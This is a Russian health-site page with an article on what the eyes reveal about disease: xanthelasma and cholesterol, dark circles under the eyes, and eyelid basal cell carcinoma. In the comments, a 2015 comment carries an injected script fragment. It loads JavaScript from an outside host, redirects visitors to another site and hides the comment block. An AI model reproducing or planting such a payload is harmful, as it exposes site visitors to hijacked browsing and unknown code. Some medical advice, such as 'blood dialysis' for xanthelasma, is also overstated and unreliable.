Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  О чем говорят наши глаза  >>  О чем говорят наши глаза
 
Обратная связь
 

О чем говорят наши глаза

Размер шрифта
06 апреля 2012 10:00
  • google_analytics: false
  • Нравится

Глаза – это зеркало здоровья. Признаки каких болезней может увидеть врач, заглянув в ваши глаза, и как эти болезни лечить?

  • Ксантелазма – отложение жира (холестерина) и является наследственной особенностью в некоторых семьях.

Суть заболевания. Этот симптом говорит о серьезном наследственном нарушении жирового обмена – гиперхолестеринемии, или повышении уровня холестерина в крови. Холестерин находится в большом избытке и начинает откладываться под кожей. Наличие у человека ксантелазмы напрямую говорит о риске инфарктов, инсультов и сосудистых осложнений, прогноз которых крайне неблагоприятен даже в молодом возрасте.

Что делать. Ксантелазма требует срочной консультации врача, уточнения уровня холестерина в крови при помощи анализов, лечения специальными лекарственными препаратами и проведения специальных процедур, очищающих кровь от холестерина (диализ крови).

  • Темные круги под глазами говорят о некой патологии сосудов: либо о повреждении капилляров, либо о пропотевании эритроцитов из капилляров в области под глазами.

Суть заболевания. Если вы молодой человек то этот симптом может говорить об усталости и недосыпании. Если вы – пожилой человек и отдыхаете в достаточной степени, но при этом давно наблюдаете у себя синяки под глазами, то вам нужно обязательно обратиться к врачу по поводу предполагаемого системного заболевания сосудов, например атеросклероза. Также причиной появления синих кругов под глазами могут быть проблемы иного свойства: какие-то иммунные заболевания, которые проявляются выходом эритроцитов за сосудистую стенку.

Что делать. В целом этот симптом говорит о хрупкости или поражении сосудов, поэтому обязательно нужно пойти к врачу, чтобы специалист разобрался, что именно вызвало появление синих кругов у вас под глазами. Чаще всего это бывает атеросклероз или гипертоническая болезнь, но врач определит наверняка.

  • Базальная клеточная карцинома – рак кожи век, который по внешнему виду похож на так называемый ячмень.

Суть заболевания. У людей часто появляется ячмень, но если он не проходит в течение нескольких недель, это должно навести на мысль, что это может оказаться злокачественной опухолью. Базальная клеточная карцинома почти не метастазирует, но она глубоко проникает в окружающие глаз ткани, что может привести к полному повреждению глаза.

Что делать. Необходима срочная консультация врача. Не нужно дожидаться того, что этот «ячмень» пройдет сам, лучше показаться врачу, который решит, что делать. Если эта опухоль окажется раком, то будет назначено оперативное лечение – полное удаление опухоли. Поэтому чем раньше показаться к врачу, тем больше шансов на быстрое и полное выздоровление, ведь эта опухоль наименее злокачественная из всех видов рака.

Сюжеты по теме:
О чем говорят наши глаза

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 23:45

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Этот продукт спасет от слепоты   Какой длины должны быть ваши ресницы?   Как сидеть за компьютером, чтобы из глаз не пошла кровь?   Мифы о солнцезащитных очках  
29 мая 2013Почему есть люди, которые внушают доверие? Оказывается, у них есть всего 2 черты лица, которых нет у других! 13 марта 2013Куда надо смотреть, чтобы понять, что думает человек
 
18 февраля 2013Люди с повышенным внутриглазным давлением чаще разбиваются на машинах 01 февраля 2013Диагноз «шизофрения» можно поставить по движению глаз
 

Слайдшоу

1
Вы не правильно красите ресницы! Как надо?
Как улучшить результаты анализов. Часть 2
Как же избавиться от мешков под глазами

Тесты

Проверьте свое зрение
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.